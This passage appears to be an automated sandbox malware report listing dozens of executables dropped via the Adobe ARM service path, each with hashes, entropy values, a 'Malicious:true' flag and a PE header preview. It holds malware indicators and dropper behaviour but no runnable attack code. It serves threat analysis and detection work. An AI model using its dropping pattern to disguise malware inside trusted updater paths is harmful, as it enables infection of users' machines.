                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E@..$...$...$...\...$...V*..$...V-..$...V+..$...V/..$...$/.0 ...V&..$...V..$...V..$...V,..$..Rich.$..........PE..d...!!.R.........."......`..........0C.........@.............................`"........... .......... ......................................Xl..........X.......d.......................T...................8...(.......8...........`...`............................text...(X.......`.................. ..`.rdata..z....p... ...p..............@..@.data...............................@....pdata..d........ ..................@..@.rsrc...X...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):5855744
                                                                                                                                                        Entropy (8bit):6.5721293992298175
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:98304:OALuzDKnxCp3JKCrPJzruaI6HMaJTtGbr7wRGpj3:ZaGg3cuPIaI6HMaJTtGbPF9
                                                                                                                                                        MD5:45FE43EF9CFE39B8BF2964232F91E6F7
                                                                                                                                                        SHA1:EE53B13474DB3DAC93CFEC62473B2502692C1573
                                                                                                                                                        SHA-256:2A20B9B6DAFED78D745619E6C1B09958EF22029BCFA04D58C7CDF1BDB8AF4B21
                                                                                                                                                        SHA-512:5C50A79F77CF552E57F88467160D0F2CDD8D3DEE1243DA6D8A56C5003AE023DA42789737A7BEF0A53366E5F47966EF6B8083D31CD4A5719AE962DBE41DBD5BDC
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......Jc.M.............p......nx......nx......).......)........p.......p.......p..&....p..............nx..i...kx......kx......kx..g...kxx.............kx......Rich....................PE..d....".e..........".... .z6..........32........@..............................Y......&Z... .................................................8.B.......K..a...PI..%..................0.B.8...................X.B.(.....7.@.............6.0.....B......................text....y6......z6................. ..`.rdata..5.....6......~6.............@..@.data...`....0G.......G.............@....pdata...%...PI..&...:I.............@..@.didat.. .....K......`K.............@..._RDATA..\.....K......fK.............@..@.rsrc....a....K..b...hK.............@..@.reloc........P.......O.............@...................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1468416
                                                                                                                                                        Entropy (8bit):4.890054154226477
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:fXr/SVAxWh/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:DNx0LNiXicJFFRGNzj3
                                                                                                                                                        MD5:75AE17B2005703EBC2CDC2D976AFE8AE
                                                                                                                                                        SHA1:15FEE3990EB77C609FCF1A615BD3309B8FAB6EC7
                                                                                                                                                        SHA-256:9924033B91C332EA503A952CBE5A73BCEC0E8E574CC5955FC400FC8E7068C70F
                                                                                                                                                        SHA-512:A20F70512C18B48267B83C490DA6C642611902436D3EB709F450263586D239C34DCF94018FA87CC0ADA3ABD70276D4A9FF9B760BB84FD1171D0CC16CFA6FADAD
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k.......k.......k.......k.......k...k..Ro.......k....l..k.......k....n..k.......k..Rich.k..........PE..L...9.A/.....................T......@V............@..........................`!.....QC........... ......................................8............................_..T...............................@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...8...........................@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):27533312
                                                                                                                                                        Entropy (8bit):6.248046057765981
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:196608:QhRrmpGpGdJM7Hbp8JfrCGvqTYuNDmoefAlprtPz25HqaI6HMaJTtGbQODF9:QhRCpGpMJMrbp8JjpWdNlc5m9
                                                                                                                                                        MD5:904BC93DDC9BB99EB0A48B5F8E43F5CD
                                                                                                                                                        SHA1:8EB99FD66563EAD3B8D17C3744EE85A8794DEFA1
                                                                                                                                                        SHA-256:A4C2DEBAF195E61E999FCE007A1D8C7D70AFE4E5486E0464FF7D099F903B602F
                                                                                                                                                        SHA-512:FFE679A3994DCFA51967A22E12877930B0E703BD0AE15200EE4D0BC4FB0F2CD80A491B12E883266D2460451448C0E454B865A92F5D35FA1BC8CDFD9B415F157E
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......$.|+`{.x`{.x`{.xi..xv{.x...yf{.x...yj{.x...yd{.x...yO{.xG..xh{.xG.oxa{.x...yb{.x...ya{.x...ya{.x...yd{.x...yc{.x...y~{.x...y}{.x`{.xTs.x...ya{.x...yjz.x...y v.x...xa{.x`{.xa{.x...ya{.xRich`{.x........PE..d......e..........".... .....H.................@......................................... ..................................................u..D.... ?...X...7.........................8....................U..(...`...@............0.. "..l .......................text............................... ..`.rdata..S.~..0....~.................@..@.data.........1.......0.............@....pdata........7.......7.............@..@.didat..`.....>.......>.............@....detourc.!....>.."....>.............@..@.rsrc.....X.. ?...X...>.............@..@.reloc..............................@...........................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2199552
                                                                                                                                                        Entropy (8bit):6.7822147168376326
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:L83pZ3kd0CuEeN0LUmRXbYs65mXLNiXicJFFRGNzj3:LKuUMY15o7wRGpj3
                                                                                                                                                        MD5:19B81DFEA343C63499167C6C1E7F8BBE
                                                                                                                                                        SHA1:A3FDC5A8A2156E4D742C1A68760A142C20C18583
                                                                                                                                                        SHA-256:A713337A58A74AAB757139731729CF4C00C7E1A1B91906176B5826EEF4E56260
                                                                                                                                                        SHA-512:729B52F2D6F130D0B5BE0B4D4B5750FB86BCBC9CE3C8C1BD21DB2ED96A390204D3A984CB0A88BEEF623D6772E32747DA2765649F2A29E7E0FBD304E4777A19F3
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D................7......................!..............~............Y.......[............Rich............PE..d...rq............"..................$.........@..............................!.....zl"... .......... ......................................P...|....p... ......L....................a..T...................Xt..(... s..8............t...............................text...6........................... ..`.rdata..............................@..@.data...@...........................@....pdata..L...........................@..@.rsrc.... ...p...0...P..............@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4971008
                                                                                                                                                        Entropy (8bit):6.66818880612677
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:9Erw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGO8ndOPcptz6+M7:rA4oGlcR+glpdOPKzgVZB7wRGpj3
                                                                                                                                                        MD5:8A8FD413879072F5FF72C8991A3DDA48
                                                                                                                                                        SHA1:A2DEE010354CEF35720C6DA83FB9ADDF1E7BE40A
                                                                                                                                                        SHA-256:F36357E8C5CB8186E99D66B9292D27F65BDAF4CFF8D4587005AB6D65EB41F1B2
                                                                                                                                                        SHA-512:750BCE1FCB8483B9EE6A661F420D052F62FECBB33B33EB81DC79BC5835BABDB39D91D080E5BB09D64BA3A5CEE7CD81C010B2F0C4649275A95286792342A925AE
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Eh.<..{o..{o..{o.q.o..{oaszn..{oas~n*.{oas.n..{oasxn..{o.{}n..{o.{xn..{o.{.n..{o.{zn..{o..zo..{odsxn..{ods~n..{odsrnF.{ods.o..{o...o..{odsyn..{oRich..{o........PE..d...0m.d..........".... ..-.........0p+........@..............................L......LL... .................................................HZ:.......B.......@.<C....................:.8...................p.9.(... P..@.............-......H:.@....................text...[.-.......-................. ..`.rdata..9.....-.......-.............@..@.data...x....`>......>>.............@....pdata..<C....@..D....@.............@..@.didat..`.....B......LB.............@....rsrc.........B......PB.............@..@.reloc........B......ZB.............@...........................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4897792
                                                                                                                                                        Entropy (8bit):6.827342087452631
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:w8ErLqTGsitHloGgkiDrCvJVZfEcpwD0YLgVCM2hnwLNwiHaGI3Y/685ZYMaWgKQ:dv2gM+qwtLg7pPgw/DSZlF7wRGpj3
                                                                                                                                                        MD5:530DDD1FC64600A2E27A6851D10D870E
                                                                                                                                                        SHA1:6A4DA18A1CB6280D577F0D53DB332ECEF9A146BB
                                                                                                                                                        SHA-256:7639EBABC777BEA7EE400A7F1FCB8AE287911F0227B34A73355FDEB67387208C
                                                                                                                                                        SHA-512:AAB42C65CD7ED952AF535FDC89D42EFA8E9BC06C00D4B2EB54E9914FCC517F889063C64086283268D37E538078439C65A903C5E72A59FBCD7C00CA23A146429E
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......D/......... ..........@..............................L.......K... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4897792
                                                                                                                                                        Entropy (8bit):6.827340529998543
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:P8ErLqTGsitHloGgkiDrCvJVZfEcpwD0YLgVCM2hnwLNwiHaGI3Y/685ZYMaWgKQ:Yv2gM+qwtLg7pPgw/DSZlF7wRGpj3
                                                                                                                                                        MD5:22442245DBD7E1ADF3B7AC13A20DAC38
                                                                                                                                                        SHA1:189945B92DA523F8617ACA18B0914FF88D8F9791
                                                                                                                                                        SHA-256:D9FB6E86607043014862C193044B297779F7775DC8C6132FDE21441A6BBF343D
                                                                                                                                                        SHA-512:F0BA69D504DB2CBE8BCE0D0E033C8793FF94678D6C1940E4EA3DA0C454B9369B2F7996F5752C81AA5A9920A48C32BFBB6C2A374063F965789C2FC361F1E27097
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......D/......... ..........@..............................L.......J... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2156544
                                                                                                                                                        Entropy (8bit):6.947492837398586
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:utjqL8fHv8aUbp8D/8+xJWAp/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:GjKKv81FI/8ovLNiXicJFFRGNzj3
                                                                                                                                                        MD5:CD8A2CB6948F6FEEEF255BC6ED3E5B67
                                                                                                                                                        SHA1:D2E9D392912527332B001AD0D5771A53119F9D5C
                                                                                                                                                        SHA-256:D93243A33E6E8084E4EEF9F43CCB3A83A50D447420A0FF2C6CF3571C780CB090
                                                                                                                                                        SHA-512:87B4A2B068243430C3F1B3557987B643097F5E2D6470216E65770F2AAA790E23C37AE1C03BCF39C04DD590EBEC9D52725A24C12D4CE3EEE48F3AD956B88F9983
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......F.....................@.............................P".......!... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................
                                                                                                                                                        Process:C:\Users\user\Desktop\SABXJ1B5c8.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):2370560
                                                                                                                                                        Entropy (8bit):7.027355684391404
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:5AMsOu3JfCIGcZuTodRFYKBrFIbWpALNiXicJFFRGNzj3:5AMa3PZuTSO7wRGpj3
                                                                                                                                                        MD5:93D4C3E254614DCFACCBECACC27C738E
                                                                                                                                                        SHA1:61D606EAD6CA99223BA0A5987582646273D580FB
                                                                                                                                                        SHA-256:9D8BD6A848CB7A841055FA500535E12C62CAC575582BA7E046674D1BB5B0421B
                                                                                                                                                        SHA-512:66303BBECF7A5640A70068D6DA06094452252148ACC6D452FC1ED6AEDA57483C5BC053A49F85BBB2570ACA4593F947C5200A06B8E8C818D94CC9B6A276908118
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................0..........@..............................%.......%... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1984512
                                                                                                                                                        Entropy (8bit):7.098278468736712
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:rSK7Fhsly2EPfOQEQLNiXicJFFRGNzj3:mU2c0Q7wRGpj3
                                                                                                                                                        MD5:B3B9C21D741B49068B3F2503590F8523
                                                                                                                                                        SHA1:0394541740F7FF9ACDE86986E7D4D63DCC74F9CF
                                                                                                                                                        SHA-256:8548561400260EDA6394E685818F492CE19FE0FA8973528DA1CB503154EC829C
                                                                                                                                                        SHA-512:05879E700473F6642D1CBC6210478E9D453B15F3398BA2BDEAA9C9C5FDAFF079EF950BD0D6E19E179293F88DA6260E3F696736D979C36D1160B7A932911E3DAA
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@....................................*`.... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1779712
                                                                                                                                                        Entropy (8bit):7.151345611187444
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:0v7e0j11mD+/wDxb2LNiXicJFFRGNzj3:uDx1mN27wRGpj3
                                                                                                                                                        MD5:98CF784B2A4051BDD8DA526AF48EBE6B
                                                                                                                                                        SHA1:2837574981DFD5A387BC5C11980D16A5E26186D3
                                                                                                                                                        SHA-256:C3EB80ECEAEA665F9173689EB4721D85DC7216377644DFBCEFB0A0BB3E7F2D18
                                                                                                                                                        SHA-512:4FCDE693037A1CE7C245FD111844F023C2FED03E06714FE3C06C24F94E2D52DDB9D5B04D1793DF127F6BC3791223DBC71DDF6192D9A0FC2C6DF120E9172CBBC3
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........B.................@....................................&..... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).......*..................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.......*..............@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1533952
                                                                                                                                                        Entropy (8bit):4.933078934964392
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:jKhSX/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:jhLNiXicJFFRGNzj3
                                                                                                                                                        MD5:019CF1B73C5D2DF570E8DE9C98EF40A8
                                                                                                                                                        SHA1:750FBF57FA67B1D8E10C23207189F5722763F323
                                                                                                                                                        SHA-256:94469104C2029540C4FD93677D01945CDDF16312E1ED7ACF6C05DB3DBDBB3400
                                                                                                                                                        SHA-512:5026B7AFA8BC73644EA337A9095CBACED675C0E813EA97E350C90A1F299BDAA203D1C65BCB47A4E8F8E93C81D34F11E9571B1DF733E89902DFB4363490BE0D91
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@.............................."......7.... ..................................................................P......................T...........................(...p...8...........H................................text............................... ..`.rdata...h.......j..................@..@.data........@......................@....pdata.......P.......0..............@..@.00cfg..(....`.......@..............@..@.tls.........p.......B..............@....voltbl..............D...................rsrc................F..............@..@.reloc...`... ......................@...................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1286656
                                                                                                                                                        Entropy (8bit):7.213913639356115
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:ZsFfc1VyFnTUQn652bO4Hc/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ZsFcInTrJ2LNiXicJFFRGNzj3
                                                                                                                                                        MD5:C40A920DC6C8C3678093A8CFCAC3FA86
                                                                                                                                                        SHA1:E5754B4B5D57CA7E2135F774952B4B866087D827
                                                                                                                                                        SHA-256:B72FF3A4709C71B77B03FB52DE97EA18638A681CC3F172005F3AF5F33933DA6E
                                                                                                                                                        SHA-512:1F3FA97DBF242E773AC7AAC078649C632862F77D4612761ABA50CA1EDD8FFEDD387DE5389BD84D48DB4E7A582853A01EC3E41F8353ED2E2F86FEA037FE080D83
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......6..........pX.........@....................................E*.... ..........................................J.......K..........`........%..................DA..........................(...`...8............V...............................text...V5.......6.................. ..`.rdata...O...P...P...:..............@..@.data...............................@....pdata...%.......&..................@..@.00cfg..(...........................@..@.tls................................@....voltbl..................................rsrc...`...........................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1246208
                                                                                                                                                        Entropy (8bit):7.485573266295393
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:Ot9j6p4xQbiKI69wpemIwpel9b/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Ot9+aQbtl2peapeltLNiXicJFFRGNzj3
                                                                                                                                                        MD5:5F4861873FC865B04F9091AE35C9DC5D
                                                                                                                                                        SHA1:1E1DFB9D0D9183B4033774A09FACD5D18C27A886
                                                                                                                                                        SHA-256:D43FED7B8487284A9C87AA86CC9D162E970FD63CC309D0B27B2AE3BFA36F814A
                                                                                                                                                        SHA-512:FA603767CAA227557E887F484C02F2E0B076D187F3FDC5DC3B147CFA103AB734CE4921446D43DA265B69C029335C608E502A568955B232CAC876CFA54F934B03
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......$.....................@....................................9P.... .................................................g...h............P..t%..................4........................k..(....@..8...........P...........@....................text....".......$.................. ..`.rdata.......@.......(..............@..@.data...p+... ......................@....pdata..t%...P...&..................@..@.00cfg..(............2..............@..@.freestd.............4..............@..@.retplne$............6...................tls.................8..............@....voltbl..............:...................rsrc................<..............@..@.reloc...............$..............@...................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1512448
                                                                                                                                                        Entropy (8bit):4.897864242391193
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:aQVTZu0J0/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:pVTZudLNiXicJFFRGNzj3
                                                                                                                                                        MD5:E22582C5CF343A4FF88FB1EC2F0DD9C7
                                                                                                                                                        SHA1:B35E3B20EBE324CB8FE48393E3CFE64AFD37F3AF
                                                                                                                                                        SHA-256:17AA28A8EE10DB6B57AC69EE7A03CB456491249470F85850E874C539394D813A
                                                                                                                                                        SHA-512:50724CCACE9EEFD6148EEEAB06FB7F883F68A2F7CC3FE3CC95A8170B0202812253C54D349281E67B109A9F8C82B4BC9D2CA1C8BF77C4790EE147C73DD8C1B066
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................`"......[.... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...`...........t..............@...........................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1344000
                                                                                                                                                        Entropy (8bit):6.798378616560327
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:RC1vpgXcZ/zm/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:RC1vpIc9mLNiXicJFFRGNzj3
                                                                                                                                                        MD5:B373F0D2577AA380D0B20A7A1F4CF036
                                                                                                                                                        SHA1:CDDE219449AE4A2CA322D9B2AE7C50C2DE1364BC
                                                                                                                                                        SHA-256:13DA36A95F16BF61E1F3505831288F2629621AB2338F8C531EF122B97D7BEC9B
                                                                                                                                                        SHA-512:32B4AD733E28E6ABB6B0D5B6DB330EF1322F8B5E55EC2D5FE23D1376372DC0822A8265D73154879EAD138D75F4C3C8CD226AA46B5F20643F652C642150E23AC9
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......T...H......0..........@.......................................... .........................................................................................T........................r..(....p..8...............`............................text...fS.......T.................. ..`.rdata.......p.......X..............@..@.data....2...@...,..."..............@....pdata...............N..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl..............h...................rsrc................j..............@..@.reloc... ...........r..............@...................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1355776
                                                                                                                                                        Entropy (8bit):4.651125836575173
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:rS6/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:3LNiXicJFFRGNzj3
                                                                                                                                                        MD5:555D3E56D59350DD93C53C400CA9468D
                                                                                                                                                        SHA1:79EF21D0AB8D0E5C9D6145036635248499CCDD3F
                                                                                                                                                        SHA-256:B0F889E3743C45F639B835182FBD72C444E13DEB9B6C14D7CD0A8F8A45F4CF9F
                                                                                                                                                        SHA-512:54B82167CE20C075701F77A38440DCF0449372462ABFC8724811C53016D47935E3063447F7377A86B09777D987C68AE27F35B70431303A7227F9090B604B4029
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........b......`..........@.......................................... ..........................................................`....... .. ...................t...........................(.......8............................................text............................... ..`.rdata..dM.......N..................@..@.data...............................@....pdata.. .... ......................@..@.00cfg..(....0......................@..@.tls.........@......................@....voltbl......P...........................rsrc........`......................@..@.reloc...`...p......................@...................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1564160
                                                                                                                                                        Entropy (8bit):5.0022947204978205
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:4WDntIfGpE/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:zZIeuLNiXicJFFRGNzj3
                                                                                                                                                        MD5:173D5AEB9D834B334A1E5AFABF2F55B5
                                                                                                                                                        SHA1:A45B0432DB967E01A650C8FDEBE788AA6A112FEB
                                                                                                                                                        SHA-256:06C23DC77B58EBE3114A631E30DD2A5D1D6A4DB3DB7F38350F2B56C1A73C0BA7
                                                                                                                                                        SHA-512:FFE7844ACAF6E82F64EECBD67B36C4132EC99E35FA4A08775BF1CAD01437651DF18B6AB7D23A9C96687BF112B0831A8D045FB5A3944E4F747B27713730B31774
                                                                                                                                                        Malicious:true
                                                                                                                                                        Reputation:unknown
                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@..............................#........... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...`...........>..............@...................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1340928
                                                                                                                                                        Entropy (8bit):4.611594773303976
                                                                                                                                                        Encrypted:false
